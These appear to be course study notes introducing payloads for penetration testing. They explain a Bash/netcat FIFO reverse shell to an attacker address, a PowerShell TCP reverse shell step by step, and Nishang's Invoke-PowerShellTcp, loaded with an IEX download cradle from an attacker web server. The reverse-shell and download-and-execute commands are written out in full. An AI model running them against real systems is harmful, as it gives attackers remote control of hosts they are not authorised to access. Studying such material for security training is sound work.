Introduction to Payloads

Here are your notes on “Introduction to Payloads”: broken down, simplified, and easy to revise 📘💡


πŸ” What Is a Payload?

  • In cybersecurity, a payload is the code or command that runs on the target once an exploit has delivered it. The exploit gets you in; the payload does the work.

  • It performs a specific action (e.g., open a shell, dump credentials, exfiltrate data).

  • It can be detected and blocked by endpoint defenses such as antivirus/EDR (e.g., Windows Defender), which is why well-known payloads are often encoded or modified before use.

  • Think of it like the message in an email: the delivery mechanism (the exploit) is the envelope, and the payload is what actually gets delivered and executed.


💣 Bash/Netcat Reverse Shell One-Liner Breakdown

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

Step-by-step:

  1. rm -f /tmp/f; → Removes any existing file at /tmp/f so that mkfifo does not fail (-f suppresses the error if nothing is there).

  2. mkfifo /tmp/f; → Creates a named pipe (FIFO): bytes written into it by one process can be read out by another.

  3. cat /tmp/f | → Reads whatever arrives in the pipe and passes it to Bash's stdin.

  4. /bin/bash -i 2>&1 | → Interactive Bash; 2>&1 merges stderr into stdout so error messages also reach the attacker.

  5. nc 10.10.14.12 7777 > /tmp/f → Connects to the attacker's listener on 10.10.14.12:7777, sends Bash's output over the socket, and writes whatever the attacker types back into the pipe, where cat picks it up and feeds it to Bash.

  The pieces form a loop: attacker → nc → /tmp/f → cat → bash → nc → attacker. The FIFO is what closes the loop, since a plain pipeline can only flow one way.

📌 Used on Linux to get a reverse shell with a netcat build that lacks the -e option. The attacker must already be listening (e.g., nc -lvnp 7777) before the one-liner runs, and the 10.10.14.12/7777 values are swapped for the attacker's real address and port.


🧠 PowerShell Reverse Shell One-Liner Breakdown

Step-by-step:

  1. powershell -nop -c → Starts PowerShell with no profile (-NoProfile) and runs the quoted string that follows as a command (-Command).

  2. $client = New-Object System.Net.Sockets.TCPClient(IP, Port); → Opens a TCP connection to the attacker's IP and port (the attacker must already be listening).

  3. $stream = $client.GetStream(); → Gets the network stream used both to read commands and to write results.

  4. [byte[]]$bytes = 0..65535|%{0}; → Allocates a 64 KB receive buffer filled with zeros (% is the alias for ForEach-Object); it is pre-sized, not empty.

  5. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) → Reads from the socket in a loop; $i is the number of bytes received, and the loop ends when Read returns 0 (the attacker closed the connection).

  6. GetString($bytes, 0, $i) → Decodes only the $i bytes actually received as ASCII text.

  7. iex $data 2>&1 → Executes the received text as PowerShell (iex is Invoke-Expression); 2>&1 merges errors into the output so the attacker sees them too.

  8. Out-String → Flattens the resulting objects into a single string that can be sent over the wire.

  9. Get-Location → Builds a fake prompt from the current directory (e.g., PS C:\Users\bob> ) and appends it to the output, written as (pwd).Path in the one-liner.

  10. GetBytes(...) → Encodes the response string back into bytes.

  11. $stream.Write(...); $stream.Flush() → Sends the response to the attacker and flushes the stream.

  12. $client.Close() → Closes the socket once the loop exits.

📌 Used on Windows for reverse shells via PowerShell. Because this exact string is so widely published, Windows Defender/AMSI commonly flags it as-is, which is the point made above about payloads being blocked.


🧰 PowerShell TCP Shell Script Example (Nishang)

  • Invoke-PowerShellTcp is a function/script from the Nishang framework that provides reverse or bind shells.

  • Parameters:

    • -Reverse: the target connects out to the attacker (used with -IPAddress and -Port).

    • -Bind: the target listens on -Port and waits for the attacker to connect in.

  • Built on the .NET TcpClient (reverse) and TcpListener (bind) classes, the same building blocks as the one-liner above.

  • Automates reverse/bind connections for penetration testers so the socket loop does not have to be retyped each time.
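As an added example of how the two modes are invoked (not code from this page or from the Nishang project itself), the block below loads the script into memory and calls it once in each mode. It assumes the script has been staged on an attacker web server at 10.10.14.12 (placeholder) and that the matching listener or client is started on the attacker side as noted in the comments.

```powershell
# Added example: invoking Nishang's Invoke-PowerShellTcp in reverse and bind mode.
# Not from the page; 10.10.14.12 and <target-ip> are placeholders.

# Fetch the script and load it straight into memory (no file written to disk).
# If it was pasted into the console instead, the function is already defined.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')

# Reverse mode: target connects out to the attacker.
# Attacker side, started FIRST:   nc -lvnp 7777
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 7777

# Bind mode: target listens, attacker connects in afterwards.
# Attacker side, started SECOND:  nc <target-ip> 7777
# Only works if a host firewall allows inbound 7777 on the target.
Invoke-PowerShellTcp -Bind -Port 7777
```

Reverse mode is the usual choice because outbound connections are far more likely to pass egress filtering than a new inbound listener on the target; bind mode is useful when the target can reach you only on its own network interface, for example through a pivot.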
